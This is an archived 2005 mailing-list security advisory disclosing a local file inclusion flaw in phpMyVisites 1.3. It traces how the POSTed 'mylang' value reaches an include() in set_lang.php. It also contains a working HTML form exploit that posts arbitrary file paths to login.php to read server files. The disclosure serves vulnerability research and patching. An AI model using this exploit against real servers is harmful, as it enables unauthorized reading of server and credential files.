OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
[exploits] phpMyVisites 1.3 local file retrieval

From: Max Cerny (maxczerny.cz)
Date: Tue Apr 26 2005 - 14:35:00 CDT


==================================================================
File: phpMyVisites 1.3 local file retrieval
From: remote
Date: 26/04/2005
Credits: Max Cerny (max[at]czerny[dot]cz)
Vendor: http://www.phpmyvisites.net
Affected version: 1.3, > not tested
==================================================================

==================================================================
Description:
 Remote user can retrieve local file on the webserver
phpMyVisites is running on. It's cause due to bad user data
validation code.

FILE: include/set_lang.php

line 94:
 include "./langs/".$lang['default_lang'];

assuming, we have set $lang['default_lang'] on line 66:
 $lang['default_lang'] = $_COOKIE[$nomcookielg];

it's good, look onto
line 40:
 setcookie($nomcookielg,$_POST['mylang'],time()+3600*24*365*10);

Now, we are able to spoof the value of $_POST['mylang'] to any file,
we want to be retrieved.

==================================================================

==================================================================
Exploit:
 <form action="http://[pathtoyourphpMyVisites]/login.php" method="POST">
Local file: <input type="text" name="mylang" value="" />
<input type="submit" value="Alexx says RELAX!">
</form>

==================================================================

==================================================================
Fix:
 Contact the Vendor

==================================================================
                        Have a nice Day !
==================================================================